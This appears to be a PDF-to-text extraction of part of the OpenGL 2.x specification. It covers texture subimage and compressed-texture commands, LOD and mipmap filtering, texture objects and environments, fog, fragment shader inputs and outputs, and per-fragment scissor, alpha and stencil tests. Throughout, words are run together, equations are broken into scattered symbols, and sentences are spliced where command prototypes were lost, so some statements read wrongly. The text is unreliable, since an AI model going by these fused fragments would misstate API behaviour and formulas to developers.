framebuffer is inherently two-dimensional, there is no CopyTexImage3D com-mand. n j = y + (b c mod h) w n k = z + (b c mod d width ∗ height Arguments xoffset and yoffset of TexSubImage2D and CopyTexSubImage2Dspecify the lower left texel coordinates of a width-wide by height-high rectangularsubregion of the texture array. Negative values of xoffset and yoffset correspond tothe coordinates of border texels, addressed as in figure 3.10. Taking ws , hs , and bsto be the specified width, height, and border width of the texture array, and takingx, y, w, and h to be the xoffset, yoffset, width, and height argument values, any ofthe following relationships generates the error INVALID VALUE: x < −bs x + w > ws − b s y < −bs y + h > h s − bsCounting from zero, the nth pixel group is assigned to the texel with internal integercoordinates [i, j], where i = x + (n mod w) n j = y + (b c mod h) w The xoffset argument of TexSubImage1D and CopyTexSubImage1D speci-fies the left texel coordinate of a width-wide subregion of the texture array. Neg-ative values of xoffset correspond to the coordinates of border texels. Taking wsand bs to be the specified width and border width of the texture array, and x andw to be the xoffset and width argument values, either of the following relationshipsgenerates the error INVALID VALUE: x < −bs x + w > ws − b sCounting from zero, the nth pixel group is assigned to the texel with internal integercoordinates [i], where i = x + (n mod w) Texture images with compressed internal formats may be stored in such a waythat it is not possible to modify an image with subimage commands without having to decompress and recompress the texture image. Even if the image were modi-fied in this manner, it may not be possible to preserve the contents of some ofthe texels outside the region being modified. To avoid these complications, theGL does not support arbitrary modifications to texture images with compressedinternal formats. Calling TexSubImage3D, CopyTexSubImage3D, TexSubIm-age2D, CopyTexSubImage2D, TexSubImage1D, or CopyTexSubImage1D willresult in an INVALID OPERATION error if xoffset, yoffset, or zoffset is not equal to−bs (border width). In addition, the contents of any texel outside the region mod-ified by such a call are undefined. These restrictions may be relaxed for specificcompressed internal formats whose images are easily modified. define one-, two-, and three-dimensional texture images, respectively, with incom-ing data stored in a specific compressed image format. The target, level, inter-nalformat, width, height, depth, and border parameters have the same meaningas in TexImage1D, TexImage2D, and TexImage3D. data refers to compressedimage data stored in the compressed image format corresponding to internal-format. If a pixel unpack buffer is bound (as indicated by a non-zero value ofPIXEL UNPACK BUFFER BINDING), data is an offset into the pixel unpack bufferand the compressed data is read from the buffer relative to this offset; otherwise,data is a pointer to client memory and the compressed data is read from clientmemory relative to the pointer. Since the GL provides no specific image formats,using any of the six generic compressed internal formats as internalformat willresult in an INVALID ENUM error. For all other compressed internal formats, the compressed image will be de-coded according to the specification defining the internalformat token. Com-pressed texture images are treated as an array of imageSize ubytes relative todata. If a pixel unpack buffer object is bound and data + imageSize is greaterthan the size of the pixel buffer, an INVALID OPERATION error results. All pixelstorage and pixel transfer modes are ignored when decoding a compressed textureimage. If the imageSize parameter is not consistent with the format, dimensions,and contents of the compressed image, an INVALID VALUE error results. If thecompressed image is not encoded according to the defined image format, the re-sults of the call are undefined. Specific compressed internal formats may impose format-specific restrictionson the use of the compressed image specification calls or parameters. For example,the compressed image format might be supported only for 2D textures, or mightnot allow non-zero border values. Any such restrictions will be documented in theextension specification defining the compressed internal format; violating theserestrictions will result in an INVALID OPERATION error. Any restrictions imposed by specific compressed internal formats will beinvariant, meaning that if the GL accepts and stores a texture image incompressed form, providing the same image to CompressedTexImage1D,CompressedTexImage2D, or CompressedTexImage3D will not result in anINVALID OPERATION error if the following restrictions are satisfied: respecify only a rectangular region of an existing texture array, with incoming datastored in a known compressed image format. The target, level, xoffset, yoffset, zoff-set, width, height, and depth parameters have the same meaning as in TexSubIm-age1D, TexSubImage2D, and TexSubImage3D. data points to compressed im-age data stored in the compressed image format corresponding to format. Sincethe core GL provides no specific image formats, using any of these six genericcompressed internal formats as format will result in an INVALID ENUM error. The image pointed to by data and the imageSize parameter are interpretedas though they were provided to CompressedTexImage1D, CompressedTexIm-age2D, and CompressedTexImage3D. These commands do not provide for im-age format conversion, so an INVALID OPERATION error results if format doesnot match the internal format of the texture image being modified. If the image-Size parameter is not consistent with the format, dimensions, and contents of thecompressed image (too little or too much data), an INVALID VALUE error results. As with CompressedTexImage calls, compressed internal formats may haveadditional restrictions on the use of the compressed image specification calls orparameters. Any such restrictions will be documented in the specification defin-ing the compressed internal format; violating these restrictions will result in anINVALID OPERATION error. Any restrictions imposed by specific compressed internal formats will beinvariant, meaning that if the GL accepts and stores a texture image in com-pressed form, providing the same image to CompressedTexSubImage1D, Com-pressedTexSubImage2D, CompressedTexSubImage3D will not result in anINVALID OPERATION error if the following restrictions are satisfied: • target, level, and format match the target, level and format parameters pro- vided to the GetCompressedTexImage call returning data. target is the target, either TEXTURE 1D, TEXTURE 2D, TEXTURE 3D, orTEXTURE CUBE MAP. pname is a symbolic constant indicating the parameter tobe set; the possible constants and corresponding parameters are summarized in ta-ble 3.18. In the first form of the command, param is a value to which to set asingle-valued parameter; in the second form of the command, params is an arrayof parameters whose type depends on the parameter being set. If the values forTEXTURE BORDER COLOR, or the value for TEXTURE PRIORITY are specified asintegers, the conversion for signed integers from table 2.9 is applied to convertthese values to floating-point, followed by clamping each value to lie in [0, 1]. In the remainder of section 3.8, denote by lodmin , lodmax , levelbase ,and levelmax the values of the texture parameters TEXTURE MIN LOD, Table 3.19: Selection of cube map images based on major axis direction of texturecoordinates. TEXTURE MAX LOD, TEXTURE BASE LEVEL, and TEXTURE MAX LEVEL respec-tively. Texture parameters for a cube map texture apply to the cube map as a whole;the six distinct two-dimensional texture images use the texture parameters of thecube map itself. If the value of texture parameter GENERATE MIPMAP is TRUE, specifying orchanging texture arrays may have side effects, which are discussed in the Auto-matic Mipmap Generation discussion of section 3.8.8. 1 sc s= +1 2 |ma | 1 tc t= +1 2 |ma | This new ( s t ) is used to find a texture value in the determined face’s two-dimensional texture image using the rules given in sections 3.8.7 through 3.8.9. 1 min = 2Nwhere N is the size of the one-, two-, or three-dimensional texture image in thedirection of clamping. The maximum value is defined as max = 1 − minso that clamping is always symmetric about the [0, 1] mapped range of a texturecoordinate. −1 min = 2Nwhere N is the size (not including borders) of the one-, two-, or three-dimensionaltexture image in the direction of clamping. The maximum value is defined as The mirrored coordinate is then clamped as described above for wrap modeCLAMP TO EDGE. λ0 > lodmax lodmax , λ0 , lodmin ≤ λ0 ≤ lodmax λ= (3.20) lodmin , λ0 < lodmin undef ined, lodmin > lodmaxbiastexobj is the value of TEXTURE LOD BIAS for the bound texture object (as de-scribed in section 3.8.4). biastexunit is the value of TEXTURE LOD BIAS for thecurrent texture unit (as described in section 3.8.13). biasshader is the value ofthe optional bias parameter in the texture lookup functions available to fragmentshaders. If the texture access is performed in a fragment shader without a providedbias, or outside a fragment shader, then biasshader is zero. The sum of these valuesis clamped to the range [−biasmax , biasmax ] where biasmax is the value of theimplementation defined constant MAX TEXTURE LOD BIAS. If λ(x, y) is less than or equal to the constant c (described below in sec-tion 3.8.9) the texture is said to be magnified; if it is greater, the texture is minified. The initial values of lodmin and lodmax are chosen so as to never clamp thenormal range of λ. They may be respecified for a specific texture by calling Tex-Parameter[if] with pname set to TEXTURE MIN LOD or TEXTURE MAX LOD re-spectively. Let s(x, y) be the function that associates an s texture coordinate with eachset of window coordinates (x, y) that lie within a primitive; define t(x, y) andr(x, y) analogously. Let u(x, y) = wt × s(x, y), v(x, y) = ht × t(x, y), andw(x, y) = dt ×r(x, y), where wt , ht , and dt are as defined by equations 3.15, 3.16,and 3.17 with ws , hs , and ds equal to the width, height, and depth of the image s ∂u 2 2 2 s 2 2 2 ∂v ∂w ∂u ∂v ∂w ρ = max + + , + + ∂x ∂x ∂x ∂y ∂y ∂y (3.21)where ∂u/∂x indicates the derivative of u with respect to window x, and similarlyfor the other derivatives. For a line, the formula is s 2 2 2 ∂u ∂u ∂v ∂v ∂w ∂w ρ= ∆x + ∆y + ∆x + ∆y + ∆x + ∆y l, ∂x ∂y ∂x ∂y ∂x ∂y (3.22)where ∆x = x2 − x1 and ∆y = y2 − y1 withp(x1 , y1 ) and (x2 , y2 ) being thesegment’s window coordinate endpoints and l = ∆x2 + ∆y 2 . For a point, pixelrectangle, or bitmap, ρ ≡ 1. While it is generally agreed that equations 3.21 and 3.22 give the best resultswhen texturing, they are often impractical to implement. Therefore, an imple-mentation may approximate the ideal ρ with a function f (x, y) subject to theseconditions: 2. Let ∂u ∂u mu = max , ∂x ∂y ∂v ∂v mv = max , ∂x ∂y ∂w ∂w mw = max , . ∂x ∂y TEXTURE MIN FILTER is NEAREST, the texel in the image array of level levelbasethat is nearest (in Manhattan distance) to that specified by (s, t, r) is obtained. Thismeans the texel at location (i, j, k) becomes the texture value, with i given by ( buc, s<1 i= (3.23) wt − 1, s = 1(Recall that if TEXTURE WRAP S is REPEAT, then 0 ≤ s < 1.) Similarly, j is foundas ( bvc, t<1 j= (3.24) ht − 1, t = 1and k is found as ( bwc, r<1 k= (3.25) dt − 1, r = 1For a one-dimensional texture, j and k are irrelevant; the texel at location i be-comes the texture value. For a two-dimensional texture, k is irrelevant; the texel atlocation (i, j) becomes the texture value. When TEXTURE MIN FILTER is LINEAR, a 2 × 2 × 2 cube of texels in theimage array of level levelbase is selected. This cube is obtained by first wrappingtexture coordinates as described in section 3.8.7, then computing ( bu − 1/2c mod wt , TEXTURE WRAP S is REPEAT i0 = bu − 1/2c, otherwise ( bv − 1/2c mod ht , TEXTURE WRAP T is REPEAT j0 = bv − 1/2c, otherwise and ( bw − 1/2c mod dt , TEXTURE WRAP R is REPEAT k0 = bw − 1/2c, otherwise Then ( (i0 + 1) mod wt , TEXTURE WRAP S is REPEAT i1 = i0 + 1, otherwise ( (j0 + 1) mod ht , TEXTURE WRAP T is REPEAT j1 = j0 + 1, otherwise and ( (k0 + 1) mod dt , TEXTURE WRAP R is REPEAT k1 = k0 + 1, otherwise Let α = frac(u − 1/2) β = frac(v − 1/2) γ = frac(w − 1/2)where frac(x) denotes the fractional part of x. For a three-dimensional texture, the texture value τ is found as where τijk is the texel at location (i, j, k) in the three-dimensional texture image. For a two-dimensional texture, where τij is the texel at location (i, j) in the two-dimensional texture image. And for a one-dimensional texture, τ = (1 − α)τi0 + ατi1 MipmappingTEXTURE MIN FILTER values NEAREST MIPMAP NEAREST,NEAREST MIPMAP LINEAR, LINEAR MIPMAP NEAREST,and LINEAR MIPMAP LINEAR each require the use of a mipmap. A mipmap isan ordered set of arrays representing the same image; each array has a resolutionlower than the previous one. If the image array of level levelbase , excluding itsborder, has dimensions wb × hb × db , then there are blog2 (max(wb , hb , db ))c + 1image arrays in the mipmap. Numbering the levels such that level levelbase is the0th level, the ith array has dimensions wb hb db max(1, b i c) × max(1, b i c) × max(1, b i c) 2 2 2until the last array is reached with dimension 1 × 1 × 1. Each array in a mipmap is defined using TexImage3D, TexImage2D, Copy-TexImage2D, TexImage1D, or CopyTexImage1D; the array being set is indicatedwith the level-of-detail argument level. Level-of-detail numbers proceed fromlevelbase for the original texture array through p = blog2 (max(wb , hb , db ))c +levelbase with each unit increase indicating an array of half the dimensions of theprevious one (rounded down to the next integer if fractional) as already described.All arrays from levelbase through q = min{p, levelmax } must be defined, as dis-cussed in section 3.8.10. The values of levelbase and levelmax may be respecified for a specific tex-ture by calling TexParameter[if] with pname set to TEXTURE BASE LEVEL orTEXTURE MAX LEVEL respectively. The error INVALID VALUE is generated if either value is negative. The mipmap is used in conjunction with the level of detail to approximate theapplication of an appropriately filtered texture to a fragment. Let c be the valueof λ at which the transition from minification to magnification occurs (since thisdiscussion pertains to minification, we are concerned only with values of λ whereλ > c). For mipmap filters NEAREST MIPMAP NEAREST andLINEAR MIPMAP NEAREST, the dth mipmap array is selected, where levelbase , λ ≤ 12 d= dlevelbase + λ + 21 e − 1, λ > 12 , levelbase + λ ≤ q + 1 2 (3.27) λ > 12 , levelbase + λ > q + 1 q, 2 The rules for NEAREST or LINEAR filtering are then applied to the selectedarray. For mipmap filters NEAREST MIPMAP LINEAR and LINEAR MIPMAP LINEAR,the level d1 and d2 mipmap arrays are selected, where ( q, levelbase + λ ≥ q d1 = (3.28) blevelbase + λc, otherwise ( q, levelbase + λ ≥ q d2 = (3.29) d1 + 1, otherwise The rules for NEAREST or LINEAR filtering are then applied to each of theselected arrays, yielding two corresponding texture values τ1 and τ2 . The finaltexture value is then found as τ = [1 − frac(λ)]τ1 + frac(λ)τ2 . • The dimensions of the arrays follow the sequence described in the Mipmap- ping discussion of section 3.8.8. • levelbase ≤ levelmax Array levels k where k < levelbase or k > q are insignificant to the definition ofcompleteness. For cube map textures, a texture is cube complete if the following conditionsall hold true: • The levelbase arrays of each of the six texture images making up the cube map have identical, positive, and square dimensions. • The levelbase arrays were each specified with the same internal format. Finally, a cube map texture is mipmap cube complete if, in addition to beingcube complete, each of the six texture images considered individually is complete. level of detail, two integers describing the base and maximum mipmap array,a boolean flag indicating whether the texture is resident, a boolean indicatingwhether automatic mipmap generation should be performed, three integers de-scribing the depth texture mode, compare mode, and compare function, and thepriority associated with each set of properties. The value of the resident flag isdetermined by the GL and may change as a result of other GL operations. The flagmay only be queried, not set, by applications (see section 3.8.12). In the initialstate, the value assigned to TEXTURE MIN FILTER is NEAREST MIPMAP LINEAR,and the value for TEXTURE MAG FILTER is LINEAR. s, t, and r wrap modesare all set to REPEAT. The values of TEXTURE MIN LOD and TEXTURE MAX LODare -1000 and 1000 respectively. The values of TEXTURE BASE LEVEL andTEXTURE MAX LEVEL are 0 and 1000 respectively. TEXTURE PRIORITY is 1.0,and TEXTURE BORDER COLOR is (0,0,0,0). The value of GENERATE MIPMAPis false. The values of DEPTH TEXTURE MODE, TEXTURE COMPARE MODE, andTEXTURE COMPARE FUNC are LUMINANCE, NONE, and LEQUAL respectively. Theinitial value of TEXTURE RESIDENT is determined by the GL. In addition to the one-, two-, and three-dimensional and the six cube map setsof image arrays, the partially instantiated one-, two-, and three-dimensional andone cube map set of proxy image arrays are maintained. Each proxy array includeswidth, height (two- and three-dimensional arrays only), depth (three-dimensionalarrays only), border width, and internal format state values, as well as state forthe red, green, blue, alpha, luminance, and intensity component resolutions. Proxyarrays do not include image data, nor do they include texture properties. WhenTexImage3D is executed with target specified as PROXY TEXTURE 3D, the three-dimensional proxy state values of the specified level-of-detail are recomputed andupdated. If the image array would not be supported by TexImage3D called withtarget set to TEXTURE 3D, no error is generated, but the proxy width, height, depth,border width, and component resolutions are set to zero. If the image array wouldbe supported by such a call to TexImage3D, the proxy state values are set exactlyas though the actual image array were being specified. No pixel data are transferredor processed in either case. One- and two-dimensional proxy arrays are operated on in the same way whenTexImage1D is executed with target specified as PROXY TEXTURE 1D, or TexIm-age2D is executed with target specified as PROXY TEXTURE 2D. The cube map proxy arrays are operated on in the same manner when TexIm-age2D is executed with the target field specified as PROXY TEXTURE CUBE MAP,with the addition that determining that a given cube map texture is supported withPROXY TEXTURE CUBE MAP indicates that all six of the cube map 2D images aresupported. Likewise, if the specified PROXY TEXTURE CUBE MAP is not supported,none of the six cube map 2D images are supported. with target set to the desired texture target and texture set to the unused name.The resulting texture object is a new state vector, comprising all the state valueslisted in section 3.8.11, set to the same initial values. If the new texture object isbound to TEXTURE 1D, TEXTURE 2D, TEXTURE 3D, or TEXTURE CUBE MAP, it isand remains a one-, two-, three-dimensional, or cube map texture respectively untilit is deleted. BindTexture may also be used to bind an existing texture object to ei-ther TEXTURE 1D, TEXTURE 2D, TEXTURE 3D, or TEXTURE CUBE MAP. The errorINVALID OPERATION is generated if an attempt is made to bind a texture objectof a different target than the specified target. If the bind is successful no change ismade to the state of the bound texture object, and any previous binding to target isbroken. While a texture object is bound, GL operations on the target to which it isbound affect the bound object, and queries of the target to which it is bound returnstate from the bound object. If texture mapping of the dimensionality of the targetto which a texture object is bound is enabled, the state of the bound texture objectdirects the texturing operation. In the initial state, TEXTURE 1D, TEXTURE 2D, TEXTURE 3D,and TEXTURE CUBE MAP have one-, two-, three-dimensional, and cube map tex-ture state vectors respectively associated with them. In order that access to these initial textures not be lost, they are treated as texture objects all of whose namesare 0. The initial one-, two-, three-dimensional, and cube map texture is thereforeoperated upon, queried, and applied as TEXTURE 1D, TEXTURE 2D, TEXTURE 3D,or TEXTURE CUBE MAP respectively while 0 is bound to the corresponding targets. Texture objects are deleted by calling returns n previously unused texture object names in textures. These names aremarked as used, for the purposes of GenTextures only, but they acquire texturestate and a dimensionality only when they are first bound, just as if they wereunused. An implementation may choose to establish a working set of texture objects onwhich binding operations are performed with higher performance. A texture objectthat is currently part of the working set is said to be resident. The command returns TRUE if all of the n texture objects named in textures are resident, or if theimplementation does not distinguish a working set. If at least one of the textureobjects named in textures is not resident, then FALSE is returned, and the residenceof each texture object is returned in residences. Otherwise the contents of resi-dences are not changed. If any of the names in textures are unused or are zero,FALSE is returned, the error INVALID VALUE is generated, and the contents of res-idences are indeterminate. The residence status of a single bound texture objectcan also be queried by calling GetTexParameteriv or GetTexParameterfv withtarget set to the target to which the texture object is bound, and pname set toTEXTURE RESIDENT. AreTexturesResident indicates only whether a texture object is currently resi-dent, not whether it could not be made resident. An implementation may choose to make a texture object resident only on first use, for example. The client may guidethe GL implementation in determining which texture objects should be resident byspecifying a priority for each texture object. The command sets the priorities of the n texture objects named in textures to the values in priori-ties. Each priority value is clamped to the range [0,1] before it is assigned. Zero in-dicates the lowest priority, with the least likelihood of being resident. One indicatesthe highest priority, with the greatest likelihood of being resident. The priority of asingle bound texture object may also be changed by calling TexParameteri, Tex-Parameterf, TexParameteriv, or TexParameterfv with target set to the target towhich the texture object is bound, pname set to TEXTURE PRIORITY, and paramor params specifying the new priority value (which is clamped to the range [0,1]before being assigned). PrioritizeTextures silently ignores attempts to prioritizeunused texture object names or zero (default textures). The texture object name space, including the initial one-, two-, and three-dimensional texture objects, is shared among all texture units. A texture objectmay be bound to more than one texture unit simultaneously. After a texture objectis bound, any GL operations on that target object affect any other texture units towhich the same texture object is bound. Texture binding is affected by the setting of the state ACTIVE TEXTURE. If a texture object is deleted, it as if all texture units which are bound to thattexture object are rebound to texture object zero. sets parameters of the texture environment that specifies how texture values areinterpreted when texturing a fragment, or sets per-texture-unit filtering parameters. target must be one of POINT SPRITE, TEXTURE ENV orTEXTURE FILTER CONTROL. pname is a symbolic constant indicating theparameter to be set. In the first form of the command, param is a value to which toset a single-valued parameter; in the second form, params is a pointer to an arrayof parameters: either a single symbolic constant or a value or group of values towhich the parameter should be set. color and alpha from the texture image bound to texture unit n The state required for the current texture environment, for each texture unit,consists of a six-valued integer indicating the texture function, an eight-valued in-teger indicating the RGB combiner function and a six-valued integer indicating theALPHA combiner function, six four-valued integers indicating the combiner RGBand ALPHA source arguments, three four-valued integers indicating the combinerRGB operands, three two-valued integers indicating the combiner ALPHA operands,and four floating-point environment color values. In the initial state, the textureand combiner functions are each MODULATE, the combiner RGB and ALPHA sourcesare each TEXTURE, PREVIOUS, and CONSTANT for sources 0, 1, and 2 respectively,the combiner RGB operands for sources 0 and 1 are each SRC COLOR, the combinerRGB operand for source 2, as well as for the combiner ALPHA operands, are eachSRC ALPHA, and the environment color is (0, 0, 0, 0). The state required for the texture filtering parameters, for each texture unit,consists of a single floating-point level of detail bias. The initial value of the biasis 0.0. Table 3.23: COMBINE texture functions. The scalar expression computed for theDOT3 RGB and DOT3 RGBA functions is placed into each of the 3 (RGB) or 4 (RGBA)components of the output. The result generated from COMBINE ALPHA is ignoredfor DOT3 RGBA. tion. The format of the resulting texture sample is determined by the value ofDEPTH TEXTURE MODE. r = Dt dimensionality using the rules given in sections 3.8.6 through 3.8.9. This texturevalue is used along with the incoming fragment in computing the texture functionindicated by the currently bound texture environment. The result of this functionreplaces the incoming fragment’s primary R, G, B, and A values. These are thecolor values passed to subsequent operations. Other data associated with the in-coming fragment remain unchanged, except that the texture coordinates may bediscarded. Each texture unit is enabled and bound to texture objects independently fromthe other texture units. Each texture unit follows the precedence rules for one-, two-, three-dimensional, and cube map textures. Thus texture units can be performingtexture mapping of different dimensionalities simultaneously. Each unit has itsown enable and binding states. Each texture unit is paired with an environment function, as shown in fig-ure 3.11. The second texture function is computed using the texture value fromthe second texture, the fragment resulting from the first texture function computa-tion and the second texture unit’s environment function. If there is a third texture,the fragment resulting from the second texture function is combined with the thirdtexture value using the third texture unit’s environment function and so on. The tex-ture unit selected by ActiveTexture determines which texture unit’s environmentis modified by TexEnv calls. If the value of TEXTURE ENV MODE is COMBINE, the texture function associatedwith a given texture unit is computed using the values specified by SRCn RGB,SRCn ALPHA, OPERANDn RGB and OPERANDn ALPHA. If TEXTUREn is specified asSRCn RGB or SRCn ALPHA, the texture value from texture unit n will be used incomputing the texture function for this texture unit. Texturing is enabled and disabled individually for each texture unit. If texturingis disabled for one of the units, then the fragment resulting from the previous unitis passed unaltered to the following unit. Individual texture units beyond thosespecified by MAX TEXTURE UNITS are always treated as disabled. If a texture unit is disabled or has an invalid or incomplete texture (as definedin section 3.8.10) bound to it, then blending is disabled for that texture unit. If thetexture environment for a given enabled texture unit references a disabled textureunit, or an invalid or incomplete texture that is bound to another unit, then theresults of texture blending are undefined. The required state, per texture unit, is four bits indicating whether each of one-,two-, three-dimensional, or cube map texturing is enabled or disabled. In the intialstate, all texturing is disabled for all texture units. Cf TE0 CT0 TE1 CT1 TE2 CT2 TE3 C’f CT3 Figure 3.11. Multitexture pipeline. Four texture units are shown; however, multi- texturing may support a different number of units depending on the implementation. The input fragment color is successively combined with each texture according to the state of the corresponding texture environment, and the resulting fragment color passed as input to the next texture unit in the pipeline. 3.10 FogIf enabled, fog blends a fog color with a rasterized fragment’s post-texturing colorusing a blending factor f . Fog is enabled and disabled with the Enable and Disablecommands using the symbolic constant FOG. This factor f is computed according to one of three equations: e−c f= (3.33) e−sIf a vertex shader is active, or if the fog source, as defined below, is FOG COORD,then c is the interpolated value of the fog coordinate for this fragment. Otherwise,if the fog source is FRAGMENT DEPTH, then c is the eye-coordinate distance fromthe eye, (0, 0, 0, 1) in eye coordinates, to the fragment center. The equation and thefog source, along with either d or e and s, is specified with If pname is FOG MODE, then param must be, or params must point to an inte-ger that is one of the symbolic constants EXP, EXP2, or LINEAR, in which caseequation 3.31, 3.32, or 3.33, respectively, is selected for the fog calculation (if,when 3.33 is selected, e = s, results are undefined). If pname is FOG COORD SRC,then param must be, or params must point to an integer that is one of the sym-bolic constants FRAGMENT DEPTH or FOG COORD. If pname is FOG DENSITY,FOG START, or FOG END, then param is or params points to a value that is d, s,or e, respectively. If d is specified less than zero, the error INVALID VALUE re-sults. An implementation may choose to approximate the eye-coordinate distancefrom the eye to each fragment center by |ze |. Further, f need not be computed ateach fragment, but may be computed at each vertex and interpolated as other dataare. No matter which equation and approximation is used to compute f , the resultis clamped to [0, 1] to obtain the final f . f is used differently depending on whether the GL is in RGBA or color indexmode. In RGBA mode, if Cr represents a rasterized fragment’s R, G, or B value,then the corresponding value produced by fog is C = f Cr + (1 − f )Cf . I = ir + (1 − f )if color index, a two-valued integer to select the fog coordinate source, and a singlebit to indicate whether or not fog is enabled. In the initial state, fog is disabled,FOG COORD SRC is FRAGMENT DEPTH, FOG MODE is EXP, d = 1.0, e = 1.0, ands = 0.0; Cf = (0, 0, 0, 0) and if = 0. Fog has no effect if a fragment shader is active. fragment shader. These built-in varying variables include the data associated witha fragment that are used for fixed-function fragment processing, such as the frag-ment’s position, color, secondary color, texture coordinates, fog coordinate, andeye z coordinate. Additionally, when a vertex shader is active, it may define one or more varyingvariables (see section 2.15.3 and the OpenGL Shading Language Specification).These values are interpolated across the primitive being rendered. The results ofthese interpolations are available when varying variables of the same name aredefined in the fragment shader. User-defined varying variables are not saved in the current raster position.When processing fragments generated by the rasterization of a pixel rectangle orbitmap, that values of user-defined varying variables are undefined. Built-in vary-ing variables have well-defined values. Texture Access Texture lookups involving textures with depth component data can either re-turn the depth data directly or return the results of a comparison with the r tex-ture coordinate used to perform the lookup. The comparison operation is re-quested in the shader by using the shadow sampler types (sampler1DShadowor sampler2DShadow) and in the texture using the TEXTURE COMPARE MODE pa-rameter. These requests must be consistent; the results of a texture lookup areundefined if: If a fragment shader uses a sampler whose associated texture object is not com-plete, as defined in section 3.8.10, the texture image unit will return (R, G, B, A)= (0, 0, 0, 1). The number of separate texture units that can be accessed from within afragment shader during the rendering of a single primitive is specified by theimplementation- dependent constant MAX TEXTURE IMAGE UNITS. Shader Inputs The OpenGL Shading Language specification describes the values that are avail-able as inputs to the fragment shader. The built-in variable gl FragCoord holds the window coordinates x, y, z,and w1 for the fragment. The z component of gl FragCoord undergoes an im-plied conversion to floating-point. This conversion must leave the values 0 and1 invariant. Note that this z component already has a polygon offset added in, ifenabled (see section 3.5.5. The w1 value is computed from the wc coordinate (seesection 2.11), which is the result of the product of the projection matrix and thevertex’s eye coordinates. The built-in variables gl Color and gl SecondaryColor hold the R, G, B,and A components, respectively, of the fragment color and secondary color. Each Shader Outputs The OpenGL Shading Language specification describes the values that may beoutput by a fragment shader. These are gl FragColor, gl FragData[n], andgl FragDepth. The final fragment color values or the final fragment data valueswritten by a fragment shader are clamped to the range [0, 1] and then converted tofixed-point as described in section 2.14.9. The final fragment depth written by afragment shader is first clamped to [0, 1] and then converted to fixed-point as if itwere a window z value (see section 2.11.1). Note that the depth range computationis not applied here, only the conversion to fixed-point. Writing to gl FragColor specifies the fragment color (color numberzero) that will be used by subsequent stages of the pipeline. Writing togl FragData[n] specifies the value of fragment color number n. Any colors,or color components, associated with a fragment that are not written by the frag-ment shader are undefined. A fragment shader may not statically assign values toboth gl FragColor and gl FragData. In this case, a compile or link error willresult. A shader statically assigns a value to a variable if, after pre-processing, itcontains a statement that would write to the variable, whether or not run-time flowof control will cause that statement to be executed. Writing to gl FragDepth specifies the depth value for the fragment beingprocessed. If the active fragment shader does not statically assign a value togl FragDepth, then the depth value generated during rasterization is used by sub-sequent stages of the pipeline. Otherwise, the value assigned to gl FragDepth isused, and is undefined for any fragments where statements assigning a value togl FragDepth are not executed. Thus, if a shader statically assigns a value togl FragDepth, then it is responsible for always writing it. 201202 CHAPTER 4. PER-FRAGMENT OPERATIONS AND THE . . . Framebuffer Framebuffer Blending Logicop To Dithering (RGBA Only) Framebuffer Framebuffer Framebuffer The first test is to determine if the pixel at location (xw , yw ) in the framebufferis currently owned by the GL (more precisely, by this GL context). If it is not,the window system decides the fate the incoming fragment. Possible results arethat the fragment is discarded or that some subset of the subsequent per-fragmentoperations are applied to the fragment. This test allows the window system tocontrol the GL’s behavior, for instance, when a GL window is obscured. If left ≤ xw < left + width and bottom ≤ yw < bottom + height, then the scissortest passes. Otherwise, the test fails and the fragment is discarded. The test isenabled or disabled using Enable or Disable using the constant SCISSOR TEST.When disabled, it is as if the scissor test always passes. If either width or heightis less than zero, then the error INVALID VALUE is generated. The state requiredconsists of four integer values and a bit indicating whether the test is enabled ordisabled. In the initial state lef t = bottom = 0; width and height are determinedby the size of the GL window. Initially, the scissor test is disabled. does differ, it should be defined relative to window, not screen, coordinates, so thatrendering results are invariant with respect to window position. Next, if SAMPLE ALPHA TO ONE is enabled, each alpha value is replaced by themaximum representable alpha value. Otherwise, the alpha values are not changed. Finally, if SAMPLE COVERAGE is enabled, the fragment coverage is ANDedwith another temporary coverage. This temporary coverage is generatedin the same manner as the one described above, but as a function ofthe value of SAMPLE COVERAGE VALUE. The function need not be identical,but it must have the same properties of proportionality and invariance. IfSAMPLE COVERAGE INVERT is TRUE, the temporary coverage is inverted (all bitvalues are inverted) before it is ANDed with the fragment coverage. The values of SAMPLE COVERAGE VALUE and SAMPLE COVERAGE INVERTare specified by calling with value set to the desired coverage value, and invert set to TRUE or FALSE.value is clamped to [0,1] before being stored as SAMPLE COVERAGE VALUE.SAMPLE COVERAGE VALUE is queried by calling GetFloatv with pname set toSAMPLE COVERAGE VALUE. SAMPLE COVERAGE INVERT is queried by callingGetBooleanv with pname set to SAMPLE COVERAGE INVERT. func is a symbolic constant indicating the alpha test function; ref is a referencevalue. ref is clamped to lie in [0, 1], and then converted to a fixed-point value ac-cording to the rules given for an A component in section 2.14.9. For purposesof the alpha test, the fragment’s alpha value is also rounded to the nearest inte-ger. The possible constants specifying the test function are NEVER, ALWAYS, LESS,LEQUAL, EQUAL, GEQUAL, GREATER, or NOTEQUAL, meaning pass the fragment never, always, if the fragment’s alpha value is less than, less than or equal to, equalto, greater than or equal to, greater than, or not equal to the reference value, respec-tively. The required state consists of the floating-point reference value, an eight-valued integer indicating the comparison function, and a bit indicating if the com-parison is enabled or disabled. The initial state is for the reference value to be 0and the function to be ALWAYS. Initially, the alpha test is disabled. There are two sets of stencil-related state, the front stencil state set and the backstencil state set. Stencil tests and writes use the front set of stencil state when pro-cessing fragments rasterized from non-polygon primitives (points, lines, bitmaps,image rectangles) and front-facing polygon primitives while the back set of stencilstate is used when processing fragments rasterized from back-facing polygon prim-itives. For the purposes of stencil testing, a primitive is still considered a polygoneven if the polygon is to be rasterized as points or lines due to the current poly-gon mode. Whether a polygon is front- or back-facing is determined in the samemanner used for two-sided lighting and face culling (see sections 2.14.1 and 3.5.1). StencilFuncSeparate and StencilOpSeparate take a face argument which canbe FRONT, BACK, or FRONT AND BACK and indicates which set of state is affected.StencilFunc and StencilOp set front and back stencil state to identical values. StencilFunc and StencilFuncSeparate take three arguments that controlwhether the stencil test passes or fails. ref is an integer reference value that isused in the unsigned stencil comparison. It is clamped to the range [0, 2s − 1],where s is the number of bits in the stencil buffer. The s least significant bits of mask are bitwise ANDed with both the reference and the stored stencil value, andthe resulting masked values are those that participate in the comparison controlledby func. func is a symbolic constant that determines the stencil comparison func-tion; the eight symbolic constants are NEVER, ALWAYS, LESS, LEQUAL, EQUAL,GEQUAL, GREATER, or NOTEQUAL. Accordingly, the stencil test passes never, al-ways, and if the masked reference value is less than, less than or equal to, equal to,greater than or equal to, greater than, or not equal to the masked stored value in thestencil buffer. StencilOp and StencilOpSeparate take three arguments that indicate whathappens to the stored stencil value if this or certain subsequent tests fail or pass.sfail indicates what action is taken if the stencil test fails. The symbolic constantsare KEEP, ZERO, REPLACE, 